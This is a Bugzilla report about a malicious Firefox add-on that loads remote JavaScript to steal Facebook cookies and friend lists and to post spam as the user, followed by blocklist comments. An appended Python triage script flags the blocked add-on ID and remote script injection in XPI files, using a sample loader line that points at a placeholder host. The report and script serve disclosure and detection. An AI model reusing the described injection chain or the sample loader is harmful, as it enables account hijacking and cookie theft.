Bug 724691 - Malicious "Firefox Essentials" add-on
Status: RESOLVED FIXED
Product: Toolkit
Classification: Components
Component: Blocklisting
Version: unspecified
Platform: All All
Importance: -- normal
Assigned To: Jorge Villalobos [:jorgev]
Reported: 2012-02-06 14:39 PST by MarkH
Modified: 2016-03-07 15:30 PST


Attachments
20120206 youtube3.zip (80.69 KB, application/octet-stream)
2012-02-06 14:39 PST, MarkH

Description MarkH 2012-02-06 14:39:52 PST
Created attachment 594822
20120206 youtube3.zip

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.77 Safari/535.7

Steps to reproduce:

Downloaded add-on from http://lacolom[.]be/fbs.xpi


Actual results:

The add-on injects JS to inject http://lacolom.be/g.js, which injects http://www.lacolom.be/oepp.php as JS.

oepp.php:

Steals your cookies
Steals your friend list via /ajax/typeahead/first_degree.php

Picks one of the following bit.ly URLs:


Posts it as a status update via /ajax/updatestatus.php, and mentions your friends.

Picks one of the following bit.ly URLs:

Posts it as an update to your timeline via /ajax/ufi/modify.php

Picks one of the following FB pages:

and has you post about it via /ajax/ufi/modify.php.



Expected results:

It shouldn't steal your cookies and post to Facebook on your behalf without your consent.

Comment 1 Jorge Villalobos [:jorgev] 2012-02-06 15:36:41 PST
ID: youtube@youtuber.com

Comment 2 Jorge Villalobos [:jorgev] 2012-02-06 15:40:17 PST
https://addons.mozilla.org/en-US/firefox/blocked/i63
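
A static triage check for the behaviour reported in this bug, as an added example that is not part of the bug thread or of Mozilla's blocklist code: it reads the add-on ID from install.rdf and flags files that build a `<script>` element while referencing a remote URL. The regex heuristics, the 1 MiB size cap, the host `loader.example` and the sample XPI are assumptions constructed for illustration.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET  # untrusted input: prefer defusedxml in production

RDF = "{http://www.w3.org/1999/02/22-rdf-syntax-ns#}"
EM = "{http://www.mozilla.org/2004/em-rdf#}"
BLOCKED_IDS = {"youtube@youtuber.com"}  # add-on ID given in Comment 1
SCRIPT_CREATE = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)")
REMOTE_URL = re.compile(r"https?://[^\s'\"<>)]+")
MAX_BYTES = 1 << 20  # assumption: skip members over 1 MiB (zip-bomb guard)

def addon_id(xpi):
    """Return em:id of the install manifest (child-element or attribute form)."""
    try:
        root = ET.fromstring(xpi.read("install.rdf"))
    except (KeyError, ET.ParseError):
        return None
    for desc in root.iter(RDF + "Description"):
        if "urn:mozilla:install-manifest" in desc.attrib.values():
            child = desc.find(EM + "id")  # direct child only, not targetApplication's id
            return child.text.strip() if child is not None and child.text else desc.get(EM + "id")
    return None

def triage_xpi(data):
    """Return (kind, member, detail) findings for the XPI bytes in data."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as xpi:
        aid = addon_id(xpi)
        if aid in BLOCKED_IDS:
            findings.append(("blocked-id", "install.rdf", aid))
        for info in xpi.infolist():
            if not info.filename.endswith((".js", ".xul", ".html")) or info.file_size > MAX_BYTES:
                continue
            text = xpi.read(info).decode("utf-8", "replace")
            if SCRIPT_CREATE.search(text):  # heuristic: file builds a <script> element
                findings += [("remote-script", info.filename, u) for u in REMOTE_URL.findall(text)]
    return findings

def build_sample_xpi(addon="youtube@youtuber.com", js='var s = doc.createElement("script"); s.src = "http://loader.example/g.js";'):
    """Constructed sample XPI; loader.example is a placeholder host."""
    rdf = ('<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">'
           '<Description about="urn:mozilla:install-manifest"><em:id>%s</em:id><em:targetApplication><Description>'
           '<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id></Description></em:targetApplication></Description></RDF>' % addon)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("install.rdf", rdf)
        z.writestr("chrome/content/overlay.js", js)
    return buf.getvalue()
```

Legacy XPIs often pack chrome content in a nested .jar, which this example does not open; a hit is a lead for manual review, not a verdict.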
